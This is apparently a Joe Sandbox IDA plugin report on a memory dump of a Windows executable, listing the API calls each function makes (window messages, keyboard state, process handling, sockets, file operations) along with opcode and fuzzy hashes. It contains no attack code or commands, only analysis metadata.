                                                                                                          APIs
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EC8D24
                                                                                                          Similarity
                                                                                                          • API ID: InvalidateRect
                                                                                                          APIs
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E7C638
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E7C65A
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E7C672
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E7C690
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E7C6B1
                                                                                                          • DestroyIcon.USER32(00000000), ref: 00E7C6C0
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E7C6DD
                                                                                                          • DestroyIcon.USER32(?), ref: 00E7C6EC
                                                                                                            • Part of subcall function 00ECAAD4: DeleteObject.GDI32(00000000), ref: 00ECAB0D
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9B54D
                                                                                                            • Part of subcall function 00E9B52D: GetCurrentThreadId.KERNEL32 ref: 00E9B554
                                                                                                            • Part of subcall function 00E9B52D: AttachThreadInput.USER32(00000000,?,00E9A23B,?,00000001), ref: 00E9B55B
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9A246
                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E9A263
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E9A266
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9A26F
                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E9A28D
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E9A290
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9A299
                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E9A2B0
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E9A2B3
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2014098862-0
                                                                                                          • Opcode ID: 39289e37a4ef0ceed6fbb111e49ba030fb41b8fd86f91621e3fd5d9267c21b80
                                                                                                          • Instruction ID: e1f0f84959f4ce5c5325cf522543baabbe74bae775888269083c160177ad31bd
                                                                                                          • Opcode Fuzzy Hash: 39289e37a4ef0ceed6fbb111e49ba030fb41b8fd86f91621e3fd5d9267c21b80
                                                                                                          • Instruction Fuzzy Hash: C611E1B1951218BEFB106F61AC8AF6A3B6DEB8C750F15141AF3507B0E0CAF35C509AA0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E9915A,00000B00,?,?), ref: 00E994E2
• HeapAlloc.KERNEL32(00000000,?,00E9915A,00000B00,?,?), ref: 00E994E9
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E9915A,00000B00,?,?), ref: 00E994FE
• GetCurrentProcess.KERNEL32(?,00000000,?,00E9915A,00000B00,?,?), ref: 00E99506
• DuplicateHandle.KERNEL32(00000000,?,00E9915A,00000B00,?,?), ref: 00E99509
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E9915A,00000B00,?,?), ref: 00E99519
• GetCurrentProcess.KERNEL32(00E9915A,00000000,?,00E9915A,00000B00,?,?), ref: 00E99521
• DuplicateHandle.KERNEL32(00000000,?,00E9915A,00000B00,?,?), ref: 00E99524
• CreateThread.KERNEL32(00000000,00000000,00E9954A,00000000,00000000,00000000), ref: 00E9953E
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 65a8076e05168f9825a9af6db228c5116b0aa7567eb9c1391bd179328ccf0664
• Instruction ID: 3cdd1784dde81fbd1b92eebe824bdc85fe0cdf28f9fa62427add6dd2cfa29829
• Opcode Fuzzy Hash: 65a8076e05168f9825a9af6db228c5116b0aa7567eb9c1391bd179328ccf0664
• Instruction Fuzzy Hash: 7601BF75242304BFE710AB65EC4DF6B7B6CEB89711F454411FA05EB1A1D6709804CB20
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 14a8f973526af529604bdb45f230a701f7983a618a5df43cd539d808da42a089
• Instruction ID: e6d218967914309aeb1e00643bbc67e49eabf542b36572c98a1273d7b218866e
• Opcode Fuzzy Hash: 14a8f973526af529604bdb45f230a701f7983a618a5df43cd539d808da42a089
• Instruction Fuzzy Hash: 0EC17D71A0021A9BDF24CFA8D884AEFB7F5FB48314F189479E915BB280E7709D458B91
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: eaa6b95797c1e949bd101cedadf6eb0c5c3253c6bc7fa10af041ce7d7db760d5
• Instruction ID: ad81b456f3a8dec136b08a78a328d9dc19a43bda0e4e29f65f99c79d49b134eb
• Opcode Fuzzy Hash: eaa6b95797c1e949bd101cedadf6eb0c5c3253c6bc7fa10af041ce7d7db760d5
• Instruction Fuzzy Hash: 7C918F70A00219ABDF24CFA5D844FEFB7B8EF85714F10955DE615BB242D7709944CBA0
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EC7449
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00EC745D
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EC7477
• _wcscat.LIBCMT ref: 00EC74D2
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00EC74E9
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EC7517
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: cb223f65c61e2c70b39a1973a2ed025aba10b62336e404472928149faede2d72
• Instruction ID: d83d9d83cc223cd7cba955a9770721413a433927da19950c5db701888901259b
• Opcode Fuzzy Hash: cb223f65c61e2c70b39a1973a2ed025aba10b62336e404472928149faede2d72
• Instruction Fuzzy Hash: DE41A070A04348AFEB219F64CC85FEE7BE8EF08354F10546AFA94B7291D6729D85CB50
APIs
  • Part of subcall function 00EA4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00EA416D
  • Part of subcall function 00EA4148: Process32FirstW.KERNEL32(00000000,?), ref: 00EA417B
  • Part of subcall function 00EA4148: CloseHandle.KERNEL32(00000000), ref: 00EA4245
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBF08D
• GetLastError.KERNEL32 ref: 00EBF0A0
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBF0CF
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00EBF14C
• GetLastError.KERNEL32(00000000), ref: 00EBF157
• CloseHandle.KERNEL32(00000000), ref: 00EBF18C
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: ea74c697cae62ec78118cc4c0602d96d5d918a36090597321f5e0a635e9b280d
• Instruction ID: 92e9ed532e392268eb5cb0410f42dcee16c0584e923e41c7e92322ee0592fae1
• Opcode Fuzzy Hash: ea74c697cae62ec78118cc4c0602d96d5d918a36090597321f5e0a635e9b280d
• Instruction Fuzzy Hash: BF41AC713012019FDB15EF28DC95FAEB7E5AF84714F189819F942AB2D3CB74A808CB95
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00EA357C
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: ff901abefe2f0c1e2021ec4d5e97baa2a4c645c0f817a0dd98d5fb43f38a6de8
• Instruction ID: 76f2b316896ebf0f9bc03b01601bec9416c40b7db882987f74cba0bcc2f3283b
• Opcode Fuzzy Hash: ff901abefe2f0c1e2021ec4d5e97baa2a4c645c0f817a0dd98d5fb43f38a6de8
• Instruction Fuzzy Hash: 44110D71E49346BEE7105A38EC92DBA77DCDF0F364B20201AF600BE181E7647F4055A0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EA4802
• LoadStringW.USER32(00000000), ref: 00EA4809
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EA481F
• LoadStringW.USER32(00000000), ref: 00EA4826
• _wprintf.LIBCMT ref: 00EA484C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EA486A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00EA4847
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: e821325ac730f4d7cbf3e8c8f543c97a743b9618573d2b5b7a0fc7e6a74306f5
• Instruction ID: 9a8efe09fd9779e51dbaf78a19b7d9c7abd6c3f2c5ea9f355966b602a4e576a9
• Opcode Fuzzy Hash: e821325ac730f4d7cbf3e8c8f543c97a743b9618573d2b5b7a0fc7e6a74306f5
• Instruction Fuzzy Hash: BD0167F29413087FE71197A1ED89FFA736CD748300F440596B759F6041E6749E884B75
APIs
  • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
• GetSystemMetrics.USER32(0000000F), ref: 00ECDB42
• GetSystemMetrics.USER32(0000000F), ref: 00ECDB62
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00ECDD9D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00ECDDBB
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00ECDDDC
• ShowWindow.USER32(00000003,00000000), ref: 00ECDDFB
• InvalidateRect.USER32(?,00000000,00000001), ref: 00ECDE20
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00ECDE43
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1211466189-0
                                                                                                          • Opcode ID: 4624b1fadb2772d4d56cf1106425b0ddc080592b0bf8629405b44fffa5c5ac84
                                                                                                          • Instruction ID: 26dc3aa1a18b264501122de1256002f86ab94131bcc882cad7464012789972d9
                                                                                                          • Opcode Fuzzy Hash: 4624b1fadb2772d4d56cf1106425b0ddc080592b0bf8629405b44fffa5c5ac84
                                                                                                          • Instruction Fuzzy Hash: 9BB1AB31A04219EFCF14CF69CA84BAD7BB1FF44704F08917AEC49AE295D732A951CB90
APIs
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
  • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC044E
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: BuffCharConnectRegistryUpper_memmove
• String ID:
• API String ID: 3479070676-0
• Opcode ID: 29c6ddc4f671f47db769ee4c41eb7169e6a29e670160f13ccba3f2ed36c1801d
• Instruction ID: 7ed72f0b1c9a079932ca60d59a9d9e1bbdde2960c973770125f8543ff41b20e6
• Opcode Fuzzy Hash: 29c6ddc4f671f47db769ee4c41eb7169e6a29e670160f13ccba3f2ed36c1801d
• Instruction Fuzzy Hash: 49A16970204201DFCB15EF64C981F6EB7E5EF84314F14991DF996A72A2DB32E94ACB42
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000), ref: 00E42E9F
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000,000000FF), ref: 00E42EE7
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000), ref: 00E7C55B
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E7C508,00000004,00000000,00000000,00000000), ref: 00E7C5C7
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 80f11ee0bd29f92c49379e4c707e23107e511c8eda3ae67f04f5cc1e61ceca23
• Instruction ID: 8a3fe756dd91e1f0346af16824dbc130ed380c08cd437aa1bb96c9e1170ff8e8
• Opcode Fuzzy Hash: 80f11ee0bd29f92c49379e4c707e23107e511c8eda3ae67f04f5cc1e61ceca23
• Instruction Fuzzy Hash: C241E9306046809EC737DB29E88876A7FD6AB81304FA8B44FF647765A0C772F945D711
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00EA7698
  • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
  • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EA76CF
• EnterCriticalSection.KERNEL32(?), ref: 00EA76EB
• _memmove.LIBCMT ref: 00EA7739
• _memmove.LIBCMT ref: 00EA7756
• LeaveCriticalSection.KERNEL32(?), ref: 00EA7765
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EA777A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA7799
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: 6244ea79e17689ecbb3a9f87efc74f7fb3aacd2b64dd4284cbf4feb0ca46d72f
• Instruction ID: fde8a6a1751a9d3239bbf030ee902e61732b03ec5e741f048cb228934d725424
• Opcode Fuzzy Hash: 6244ea79e17689ecbb3a9f87efc74f7fb3aacd2b64dd4284cbf4feb0ca46d72f
• Instruction Fuzzy Hash: 43315E31A05205AFCB10EF55EC85E6EB7B8EF45350F1840A6F904BA256D7309A54DBA0
APIs
• DeleteObject.GDI32(00000000), ref: 00EC6810
• GetDC.USER32(00000000), ref: 00EC6818
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC6823
• ReleaseDC.USER32(00000000,00000000), ref: 00EC682F
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EC686B
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EC687C
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EC964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00EC68B6
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EC68D6
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 4a3ba2590b19a9145aa67047036d3010e539aee3f15df37a4020ea77a09fddba
• Instruction ID: 057f97e0e3cf01792c3c9d27a152dbe073aa736f7d179fbdef2b22ec5f32ac0c
• Opcode Fuzzy Hash: 4a3ba2590b19a9145aa67047036d3010e539aee3f15df37a4020ea77a09fddba
• Instruction Fuzzy Hash: 00318D721022107FEB148F11DD4AFEB3BA9EB49765F080055FE08AA291C6769C51CB70
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: c126695322beb3abc059319e040d276b344d96d8ab9ae6eb660437be67ab29d3
• Instruction ID: aa1354ed2440a159feb31215fc585145ca57ad545a02d5ec627a206468a385fe
• Opcode Fuzzy Hash: c126695322beb3abc059319e040d276b344d96d8ab9ae6eb660437be67ab29d3
• Instruction Fuzzy Hash: 7E2107766412057BDA157570DE82FBF73ACDE10788B283022FD02B6342E751DE22CAA2
APIs
  • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
  • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
  • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
• _wcstok.LIBCMT ref: 00EAF2D7
• _wcscpy.LIBCMT ref: 00EAF366
• _memset.LIBCMT ref: 00EAF399
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: e1e37e968dbb4d8e59fd563d62112e18d31b4a658873e74595b0c66faa69568e
• Instruction ID: 3b6f9777bfc81b918149051ed6039543ac28601d5a5d3b06b1fcad7ca9b057ec
• Opcode Fuzzy Hash: e1e37e968dbb4d8e59fd563d62112e18d31b4a658873e74595b0c66faa69568e
• Instruction Fuzzy Hash: 8AC19F716043409FC714EF64D841A5EB7E4FF89354F14696DF899AB2A2DB30EC49CB82
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EB72EB
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EB730C
• WSAGetLastError.WSOCK32(00000000), ref: 00EB731F
• htons.WSOCK32(?,?,?,00000000,?), ref: 00EB73D5
• inet_ntoa.WSOCK32(?), ref: 00EB7392
  • Part of subcall function 00E9B4EA: _strlen.LIBCMT ref: 00E9B4F4
  • Part of subcall function 00E9B4EA: _memmove.LIBCMT ref: 00E9B516
• _strlen.LIBCMT ref: 00EB742F
• _memmove.LIBCMT ref: 00EB7498
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
• Opcode ID: 7f90786999c56d065357f69a22fcd8d757403c99444395f2a8ff0d5bffdf07e5
• Instruction ID: b6072308d9d4538cd199202c253110d12bdfdfd0e2ab520465cc5a20416420d1
• Opcode Fuzzy Hash: 7f90786999c56d065357f69a22fcd8d757403c99444395f2a8ff0d5bffdf07e5
• Instruction Fuzzy Hash: A181A0B1208200ABD710EB24DC81FABB7E8EFC4714F146919F995BB2E2DA709D05CB91
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f8e921fef5b15bea0426deb0f68442e46a548215fe6d0e5aee790c775c48498
• Instruction ID: e9d1475e2ea7c3681f8d38b60f8d5007edda221c3bd54893de35c348c296d65d
• Opcode Fuzzy Hash: 9f8e921fef5b15bea0426deb0f68442e46a548215fe6d0e5aee790c775c48498
• Instruction Fuzzy Hash: D4713D70900109EFDF08DF59DC49AAEBBB9FF8A314F148199F915BA251C7349A91CBA0
APIs
• IsWindow.USER32(010C5680), ref: 00ECBA5D
• IsWindowEnabled.USER32(010C5680), ref: 00ECBA69
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00ECBB4D
• SendMessageW.USER32(010C5680,000000B0,?,?), ref: 00ECBB84
• IsDlgButtonChecked.USER32(?,?), ref: 00ECBBC1
• GetWindowLongW.USER32(010C5680,000000EC), ref: 00ECBBE3
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00ECBBFB
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 242b7fe149615cac74f2d92e0e3d5f417dc0c90838ef997f72afbcdef1153c69
• Instruction ID: 3140b5b46fd731bfbb284443dbdcbdf5cbdccdaa549b6c7bbfb080a30b64be5c
• Opcode Fuzzy Hash: 242b7fe149615cac74f2d92e0e3d5f417dc0c90838ef997f72afbcdef1153c69
• Instruction Fuzzy Hash: 2071DF34A04205AFDB209F54CA96FFABBB9EF09304F14509DF995B7291C732AC52DB50
APIs
• _memset.LIBCMT ref: 00EBFB31
• _memset.LIBCMT ref: 00EBFBFA
• ShellExecuteExW.SHELL32(?), ref: 00EBFC3F
  • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
  • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
  • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
• GetProcessId.KERNEL32(00000000), ref: 00EBFCB6
• CloseHandle.KERNEL32(00000000), ref: 00EBFCE5
Strings
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: 391d29de8c74c669e416708f0a0e9995addff67b427659cf1070352c618dd41b
• Instruction ID: 500b60182a2d66e170a6b606a4af1141bdfafa0c85061cdea417a2ddd02deb4b
• Opcode Fuzzy Hash: 391d29de8c74c669e416708f0a0e9995addff67b427659cf1070352c618dd41b
• Instruction Fuzzy Hash: 16619EB5A006199FCB14EF94D891AAEFBF4FF48314F149469E846BB391CB30AD41CB94
APIs
• GetParent.USER32(?), ref: 00EA178B
• GetKeyboardState.USER32(?), ref: 00EA17A0
• SetKeyboardState.USER32(?), ref: 00EA1801
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00EA182F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00EA184E
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00EA1894
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EA18B7
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: bb2fc4332aba475f176c1855787b7286ecbe8d722e525faad069d88d47a0174f
• Instruction ID: e0b3897fd656b196a3a533407bc68629a6a2ed817f8472e89aa6f9ae31e6b258
• Opcode Fuzzy Hash: bb2fc4332aba475f176c1855787b7286ecbe8d722e525faad069d88d47a0174f
• Instruction Fuzzy Hash: 8351B4609087D53EFB368224C855BBA7EE95B0B308F0C65C9F1D96E8D2D298FC94D750
APIs
• GetParent.USER32(00000000), ref: 00EA15A4
• GetKeyboardState.USER32(?), ref: 00EA15B9
• SetKeyboardState.USER32(?), ref: 00EA161A
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EA1646
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EA1663
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EA16A7
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EA16C8
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 66ed0c36085a54d8d4785e474557d9f5e3f72e4f8032eea4b518a863777b2a9d
• Instruction ID: 90898866b1128486295eaae611beae8db31ea8ce76750d735f728583f6f5c17d
• Opcode Fuzzy Hash: 66ed0c36085a54d8d4785e474557d9f5e3f72e4f8032eea4b518a863777b2a9d
• Instruction Fuzzy Hash: F351E4A09047D53DFB3287648C05BBA7EE95F4B308F0C64C9E0D9AE8C2C694BC98E751
APIs
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 17497db3ded68b14f09a10e339492248dd57a9c90f8385a58783906c6dc3b045
• Instruction ID: 8c091f650d72bf1fcca1914d345dec649722ff5491c16f71c89070352b56ff76
• Opcode Fuzzy Hash: 17497db3ded68b14f09a10e339492248dd57a9c90f8385a58783906c6dc3b045
• Instruction Fuzzy Hash: E741ACA6CA161875CB11FBB4D84A9CFB3F8AF09350F11A866E909F3161E634E21583A5
APIs
  • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BE0
  • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BF9
• lstrcmpiW.KERNEL32(?,?), ref: 00EA3BAA
• _wcscmp.LIBCMT ref: 00EA3BC6
• MoveFileW.KERNEL32(?,?), ref: 00EA3BDE
• _wcscat.LIBCMT ref: 00EA3C26
• SHFileOperationW.SHELL32(?), ref: 00EA3C92
Strings
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
